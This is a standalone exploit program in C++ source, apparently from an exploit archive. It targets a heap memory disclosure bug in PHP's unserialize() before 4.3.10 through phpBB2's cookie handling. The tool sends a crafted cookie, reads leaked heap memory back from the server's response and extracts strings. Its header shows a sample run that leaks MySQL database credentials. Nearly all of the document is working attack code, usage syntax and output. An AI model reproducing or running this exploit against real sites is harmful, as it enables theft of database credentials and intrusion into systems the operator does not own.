php bug in ext/standart/var_unserializer.c in php < 4.3.10 for dump php heap memory with phpbb2 ,who use unserialize() for cookie , and found the config.php(sql password) in the heap. you need and for compile /* *** coded by overdose *** slythers@xxxxxxxxx php bug in ext/standart/var_unserializer.c for read heap memorie with phpbb2 ;> tested : phpbbmemorydump.exe "" 30000 -cookiename=phpbb2support > a.txt result: - string detected : /home/virtual/ - string detected : dbname - string detected : PT_N - string detected : phpbb - string detected : dbuser - string detected : phpbb << mysql user - string detected : dbpasswd - string detected : phpBB_R0cKs << mysql password - string detected : table_prefix - string detected : phpbb_ use like : phpbbmemorydump.exe "" nboctettoreadinheap [repeat/display_all_heap] [-cookiename=phpbb2mysql] greetz: my crew MWA pull the plug , vortex challenge slipknot , dr dre , ... all #s-c and all i forget compile with borland c++ (freecommandlinetools) : bcc32 -c serv.cpp bcc32 bbmemorydump.cpp serv.obj */ #include <winsock.h> #include <iostream.h> #include "serv.h" #define HTTP_PORT 80 #define SIGNATURE_REQUEST signaturequete #define SIGNATURE_REQUEST_START "\nSet-Cookie: " #define DEFAULT_COOKIE_NAME "phpbb2mysql" #define END_SIGNATURE "_data=" #define MIN_NB_LETTRE 3 #define NB_SEC_FOR_WAIT 1000*5 // 5 secondes char signaturequete[512]; struct url{ char *dns; char *uri; unsigned short port; }; struct url parseurl(char *of); char * intostr(int erf); bool goodcar(char carac); unsigned int utf8decode(char *utf); char alphanum(char *of,bool *wesh); int main(int argc,char **argv) { struct url urlparsed; serveur http; unsigned int nbmemread; char car; bool repeat = 0; bool displayheap = 0; char *cookname = DEFAULT_COOKIE_NAME; WSAData wsadata; if (WSAStartup(MAKEWORD(2, 0),&wsadata) != 0) return 1; cout <<"coded by overdose / bad boyz coding"<<endl; if(argc < 3) { cout <<" use like : "<<argv[0]<<" \"\" nboctettoreadinheap [repeat/display_all_heap] [-cookiename=phpbb2mysql]"<<endl; return 0; }; for(int argcpt = 3;argcpt < argc;argcpt++) { if(!strcmp(argv[argcpt],"repeat")) repeat = 1; else if(!strcmp(argv[argcpt],"display_all_heap")) displayheap = 1; else if(!strncmp(argv[argcpt],"-cookiename=",sizeof("-cookiename=")-1)) { cookname= argv[argcpt] + sizeof("-cookiename=")-1; }; }; strcpy(SIGNATURE_REQUEST,SIGNATURE_REQUEST_START); strcat(SIGNATURE_REQUEST,cookname); strcat(SIGNATURE_REQUEST,END_SIGNATURE); nbmemread = atoi(argv[2]); if(!nbmemread) return 0; urlparsed = parseurl(argv[1]); if(!urlparsed.uri) return 0; do{ http.createsocket(); if(!http.connectsocket(urlparsed.dns,urlparsed.port)) { cout << "can't connect to "<<urlparsed.dns<<endl; return 0; }; http << "GET " ; http << urlparsed.uri ; http << " HTTP/1.1\nHost: "; http << urlparsed.dns ; http << "\nCookie: "; http << cookname; http << "_data=s:"; http << intostr(nbmemread); http << ":%22test1%22%3b; expires=Fri, 24-Dec-2005 21:25:37 GMT; path=/; domain="; http << urlparsed.dns; http << "\nCookie: "; http << cookname; http << "_sid=1cfd759c33ba2a45b994c7b7cfd948ec; path=/; domain="; http << urlparsed.dns; http << "\nAccept-Language: fr\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\nConnection: close\n\n"; cout <<"requete effectuer ..."<<endl; char signature[sizeof(SIGNATURE_REQUEST)]; char *word,*wtmp; unsigned int cpt ,sizesign; unsigned int compteur,cptstr; bool exit = 0; sizesign = strlen(SIGNATURE_REQUEST); memset(signature,'a',sizesign); signature[sizesign] ='\0'; compteur = 0; cptstr = 0; while(!exit && http.getnb(&car,sizeof(char))) { // ajout du detecteur de heap for(cpt = 0; cpt < (sizesign-1);cpt++) signature[cpt] = signature[cpt+1]; signature[sizesign-1] = car; if(!strcmp(signature,SIGNATURE_REQUEST)) { word = new char[nbmemread*3+1]; word[cptstr] = '\0'; compteur = strlen(intostr(nbmemread)) + 4; for(cpt = 0; cpt < compteur;cpt++) http.getnb(&car,sizeof(char)); while(!exit && http.getnb(&car,sizeof(char))) { if((car == ';') || (cptstr >= (nbmemread*3))) { exit = 1; continue; }; word[cptstr] = car; cptstr++; word[cptstr] ='\0'; }; if(displayheap) cout << word<<endl; nbmemread = utf8decode(word); for(compteur = 0;compteur < nbmemread;) { for(cpt=compteur;goodcar(word[cpt]);cpt++); if((cpt - compteur) > MIN_NB_LETTRE ) { wtmp = new char[(cpt - compteur)+1]; strncpy(wtmp,&word[compteur],cpt - compteur); wtmp[cpt - compteur] = '\0'; cout <<"- string detected : " <<wtmp<<endl; delete[] wtmp; } if(!(cpt - compteur)) cpt++; compteur = cpt; }; delete[] word; }; }; http.closesock(); if(repeat) { cout <<endl<<"attente jusqu'a la prochaine requete ..."<<endl; Sleep(NB_SEC_FOR_WAIT); }; }while(repeat); /* delete[] urlparsed.uri; delete[] urlparsed.dns; */ WSACleanup(); return 0; } struct url parseurl(char *of) { struct url retour; unsigned int taille; char tmp; retour.dns = 0x00; retour.uri = 0x00; retour.port = HTTP_PORT ; while( *of && (*of != ':')) of++; if(*of && *(of+1) && *(of+2)) { if((*(of+1) != '/') || (*(of+2) != '/')) return retour; of += 3; for(taille = 0; (of[taille] != '/') && (of[taille] != '\0') && (of[taille] != ':');taille++); retour.dns = new char [taille+1]; memcpy(retour.dns,of,taille); retour.dns[taille] = '\0'; of += taille; if(*of == ':') { of++; for(taille = 0; (of[taille] != '/') && (of[taille] != '\0');taille++); tmp = of[taille]; of[taille] = '\0'; if(taille) retour.port = atoi(of); of[taille] = tmp; of += taille; }; if(!*of) { retour.uri = new char[2]; strcpy(retour.uri,"/"); } else { retour.uri = new char [strlen(of)+1]; strcpy(retour.uri,of); }; }; return retour; } char * intostr(int erf) { char *chaine; int puissance; int erf2; if( erf >= 0) { puissance =0; for(int kekette = 1;kekette<=erf;kekette = kekette*10) { puissance++; }; if (puissance == 0) { puissance = 1; }; chaine = new char[puissance+1]; chaine[puissance] ='\0'; for(int arf = puissance-1;arf >=0;arf--) { erf2 = erf % 10 ; chaine[arf] = '0' + erf2; erf = erf /10; }; return chaine; } else return 0; } bool goodcar(char carac) { unsigned short cpt; if(!carac) return 0; // i hate do like this :/ char *goodcar = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMONPQRSTUVWXYZ012345689<>é@à)]=}è[_-{#&*\\/-+~'ç$%.:;|^~$,!?\"\'\t\r\n "; for(cpt = 0;(goodcar[cpt] != '\0') && (goodcar[cpt] != carac);cpt++); if(goodcar[cpt] == carac) return 1; return 0; } unsigned int utf8decode(char *utf) { char *r; char *w; char tmp; bool han; r = w = utf; while(*r) { if(*r =='%') { tmp = alphanum(r+1,&han); if(han) { *w = tmp; r += 2; } else *w = *r; } else *w = *r; w++; r++; }; *w = '\0'; return (w-utf); } char alphanum(char *of,bool *wesh) { unsigned char retour; retour = 0x00; *wesh = 0; if(!(*of && *(of+1))) return 0x00; if((*of >= 'a') && (*of <= 'f')) retour = ((*of - 'a') +10) * 0x10; else if((*of >= 'A') && (*of <= 'F')) retour = ((*of - 'A') +10) * 0x10; else if((*of >= '0') && (*of <= '9')) retour = (*of - '0') * 0x10; else return 0x00; of++; if((*of >= 'a') && (*of <= 'f')) retour += ((*of - 'a') +10); else if((*of >= 'A') && (*of <= 'F')) retour += ((*of - 'A') +10); else if((*of >= '0') && (*of <= '9')) retour += (*of - '0'); else return 0x00; *wesh = 1; return retour; }